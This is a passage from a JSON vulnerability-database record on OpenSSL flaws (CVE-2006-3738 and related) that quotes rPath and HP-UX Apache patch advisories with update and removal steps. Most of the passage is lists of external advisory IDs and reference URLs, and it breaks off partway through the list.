http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. rPath Security Advisory: 2006-0175-1\nPublished: 2006-09-28\nProducts: rPath Linux 1\nRating: Major\nExposure Level Classification:\n    Remote Deterministic Unauthorized Access\nUpdated Versions:\n    openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.4-1\n    openssl-scripts=/conary.rpath.com@rpl:devel//1/0.9.7f-10.4-1\n\nReferences:\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n    http://issues.rpath.com/browse/RPL-613\n\nDescription:\n    Previous versions of the openssl package are vulnerable to multiple\n    attacks. \n    In particular, any connection that the mysql daemon will accept\n    may be vulnerable.  In the default configuration of mysql, that\n    would be a local unauthorized access vulnerability, but mysql can\n    be configured to listen for network connections from remote hosts,\n    which would then enable remote unauthorized access.  Any program\n    that calls the SSL_get_shared_ciphers() function may be vulnerable. \n\n_______________________________________________\nFull-Disclosure - We believe in it. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c00849540\nVersion: 1\n\nHPSBUX02186 SSRT071299 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2007-01-17\nLast Updated: 2007-01-23\n\nPotential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), and unauthorized access. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with Apache running on HP-UX. \n\nReferences: CVE-2006-2940, CVE-2006-2937, CVE-2006-3738, CVE-2006-4343, CVE-2006-4339, CVE-2005-2969. \n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, and B.11.31 running Apache-based Web Server prior to v.2.0.58.01\n\nBACKGROUND\n\nAFFECTED VERSIONS\n\nFor IPv4:\nHP-UX B.11.00\nHP-UX B.11.11\n===========\nhpuxwsAPACHE\naction: install revision A.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nFor IPv6:\nHP-UX B.11.11\n===========\nhpuxwsAPACHE,revision=B.1.0.00.01\nhpuxwsAPACHE,revision=B.1.0.07.01\nhpuxwsAPACHE,revision=B.1.0.08.01\nhpuxwsAPACHE,revision=B.1.0.09.01\nhpuxwsAPACHE,revision=B.1.0.10.01\nhpuxwsAPACHE,revision=B.2.0.48.00\nhpuxwsAPACHE,revision=B.2.0.49.00\nhpuxwsAPACHE,revision=B.2.0.50.00\nhpuxwsAPACHE,revision=B.2.0.51.00\nhpuxwsAPACHE,revision=B.2.0.52.00\nhpuxwsAPACHE,revision=B.2.0.53.00\nhpuxwsAPACHE,revision=B.2.0.54.00\nhpuxwsAPACHE,revision=B.2.0.55.00\nhpuxwsAPACHE,revision=B.2.0.56.00\nhpuxwsAPACHE,revision=B.2.0.58.00\naction: install revision B.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nHP-UX B.11.23\n===========\nhpuxwsAPACHE\naction: install revision B.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nEND AFFECTED VERSIONS\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the issue. \nSoftware updates for the Apache-based Web Server are available from:\nhttp://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nHP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server v.2.0.58.01 or subsequent. \n\nApache Update Procedure\n\nCheck for Apache Installation\n -----------------------------\nTo determine if the Apache web server from HP is installed on your system, use Software Distributor\u0027s swlist command. All three revisions of the product may co-exist on a single system. \nFor example, the results of the command swlist -l product | grep -I apache\nhpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server\n\nStop Apache\n -------------\nBefore updating, make sure the previous Apache binary is stopped. If Apache is not stopped, the installation would be successful but the new version would be prevented from starting until a later time. \nAfter determining which Apache is installed, stop Apache with the following commands:\nfor hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop\n\nDownload and Install Apache\n --------------------------\nDownload Apache from Software Depot. http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\nVerify successful download by comparing the cksum with the value specified on the installation web page. \nUse SD to swinstall the depot. Installation of this new revision of HP Apache over an existing HP Apache installation is supported, while installation over a non-HP Apache is NOT supported. \n\nRemoving Apache Installation\n ---------------------------\nThe potential vulnerability can also be resolved by removing Apache rather than installing a newer revision. To remove Apache use both Software Distributor\u0027s \"swremove\" command and also \"rm -rf\" the home location as specified in the rc.config.d file \"HOME\" variables. \n%ls /etc/rc.config.d | \\ grep apache hpapache2conf hpws_apache[32]conf\n\nMANUAL ACTIONS: Yes - Update plus other actions\nInstall the revision of the product. \n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. \nFor more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA\n\nHISTORY: rev.1 - 23 January 2007 Initial Release\n\nThird Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com\n  Subject: get key\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your ITRC security bulletins and patches\n  - check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems\n  - verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:\n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\n\\xa9Copyright 2007 Hewlett-Packard Development Company, L.P. \n\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          }
        ],
        "trust": 3.6
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "BID",
            "id": "22083",
            "trust": 3.4
          },
          {
            "db": "SECUNIA",
            "id": "23280",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "23309",
            "trust": 2.6
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738",
            "trust": 2.2
          },
          {
            "db": "BID",
            "id": "20249",
            "trust": 2.1
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300",
            "trust": 2.1
          },
          {
            "db": "SECUNIA",
            "id": "22207",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22212",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22116",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22216",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22220",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22330",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22130",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22240",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22259",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22260",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22165",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22166",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22172",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22284",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22186",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22193",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22094",
            "trust": 1.8
          },
          {
            "db": "SECTRACK",
            "id": "1016943",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "30161",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "26329",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24930",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "30124",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22500",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22799",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22298",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "31492",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23038",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22460",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23915",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22385",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23155",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22487",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22654",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23680",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22626",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23794",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22633",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22772",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24950",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "25889",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22544",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23340",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22791",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22758",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-1401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-0343",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3902",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3869",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3860",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4314",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2315",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4264",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4036",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4417",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4750",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3820",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2783",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3936",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4443",
            "trust": 1.0
          },
          {
            "db": "SECTRACK",
            "id": "1017522",
            "trust": 1.0
          },
          {
            "db": "USCERT",
            "id": "TA06-333A",
            "trust": 1.0
          },
          {
            "db": "OSVDB",
            "id": "29262",
            "trust": 1.0
          },
          {
            "db": "BID",
            "id": "20246",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "21709",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620",
            "trust": 0.8
          },
          {
            "db": "XF",
            "id": "29237",
            "trust": 0.8
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2022.0696",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "53566",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50535",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "53990",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "id": "VAR-200110-0182",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.28107159000000004
      },
      "last_update_date": "2026-03-09T20:18:13.663000Z",
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 3.4,
            "url": "http://www.securityfocus.com/bid/22083"
          },
          {
            "trust": 2.6,
            "url": "http://www.openssl.org/news/secadv_20060928.txt"
          },
          {
            "trust": 1.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23280/"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23309/"
          },
          {
            "trust": 1.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-260.htm"
          },
          {
            "trust": 1.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-sr-20061108-openssl.shtml"
          },
          {
            "trust": 1.3,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt"
          },
          {
            "trust": 1.3,
            "url": "http://www.kb.cert.org/vuls/id/547300"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://issues.rpath.com/browse/rpl-613"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22385"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22172"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/26329"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a4256"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22330"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22220"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=130497311408250\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22116"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22799"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22094"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22654"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3860"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1185"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22193"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22216"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4401"
          },
          {
            "trust": 1.0,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22633"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:172"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1017522"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447318/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2006\u0026m=slackware-security.676946"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22626"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22212"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23309"
          },
          {
            "trust": 1.0,
            "url": "http://lists.apple.com/archives/security-announce/2006/nov/msg00001.html"
          },
          {
            "trust": 1.0,
            "url": "http://openvpn.net/changelog.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2783"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22460"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/470460/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/bid/20249"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22487"
          },
          {
            "trust": 1.0,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29237"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22240"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22772"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00805100"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9370"
          },
          {
            "trust": 1.0,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:178"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24950"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4314"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1195"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447393/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23915"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/25889"
          },
          {
            "trust": 1.0,
            "url": "ftp://patches.sgi.com/support/free/security/advisories/20061001-01-p.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22298"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23155"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2006-0695.html"
          },
          {
            "trust": 1.0,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-220.htm"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4036"
          },
          {
            "trust": 1.0,
            "url": "http://www.serv-u.com/releasenotes/"
          },
          {
            "trust": 1.0,
            "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2008-007.txt.asc"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22165"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1016943"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/456546/100/200/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22259"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23038"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_24_sr.html"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2315"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3820"
          },
          {
            "trust": 1.0,
            "url": "http://sourceforge.net/project/shownotes.php?release_id=461863\u0026group_id=69227"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/1401"
          },
          {
            "trust": 1.0,
            "url": "http://docs.info.apple.com/article.html?artnum=304829"
          },
          {
            "trust": 1.0,
            "url": "http://www.trustix.org/errata/2006/0054"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23280"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22130"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22166"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-201531-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/0343"
          },
          {
            "trust": 1.0,
            "url": "http://www.ubuntu.com/usn/usn-353-1"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23794"
          },
          {
            "trust": 1.0,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01118771"
          },
          {
            "trust": 1.0,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-06:23.openssl.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.openpkg.org/security/advisories/openpkg-sa-2006.021-openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4443"
          },
          {
            "trust": 1.0,
            "url": "http://www.osvdb.org/29262"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/31492"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3902"
          },
          {
            "trust": 1.0,
            "url": "http://www.cisco.com/en/us/products/hw/contnetw/ps4162/tsd_products_security_response09186a008077af1b.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22260"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22284"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_58_openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22500"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3869"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22186"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30124"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30161"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200612-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22544"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23680"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200805-07.xml"
          },
          {
            "trust": 1.0,
            "url": "http://security.gentoo.org/glsa/glsa-200610-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00849540"
          },
          {
            "trust": 1.0,
            "url": "https://www2.itrc.hp.com/service/cki/docdisplay.do?docid=c00967144"
          },
          {
            "trust": 1.0,
            "url": "http://www130.nortelnetworks.com/go/main.jsp?cscat=bltndetail\u0026documentoid=498093\u0026renditionid=\u0026poid=8881"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3936"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4750"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22791"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22758"
          },
          {
            "trust": 1.0,
            "url": "http://openbsd.org/errata.html#openssl2"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4264"
          },
          {
            "trust": 1.0,
            "url": "http://www.us-cert.gov/cas/techalerts/ta06-333a.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24930"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23340"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22207"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:177"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4417"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23386964/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20246"
          },
          {
            "trust": 0.8,
            "url": "http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.matasano.com/log/469/many-rsa-signatures-may-be-forgeable-in-openssl-and-elsewhere/"
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060905.txt "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/21709/"
          },
          {
            "trust": 0.8,
            "url": "http://www.rsasecurity.com/rsalabs/node.asp?id=2125"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/rfc/rfc3447.txt"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23547300/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html "
          },
          {
            "trust": 0.8,
            "url": "https://issues.rpath.com/browse/rpl-613 "
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt "
          },
          {
            "trust": 0.8,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt "
          },
          {
            "trust": 0.8,
            "url": "http://openvpn.net/changelog.html "
          },
          {
            "trust": 0.8,
            "url": "http://www.serv-u.com/releasenotes/ "
          },
          {
            "trust": 0.8,
            "url": "http://openbsd.org/errata.html#openssl2 "
          },
          {
            "trust": 0.8,
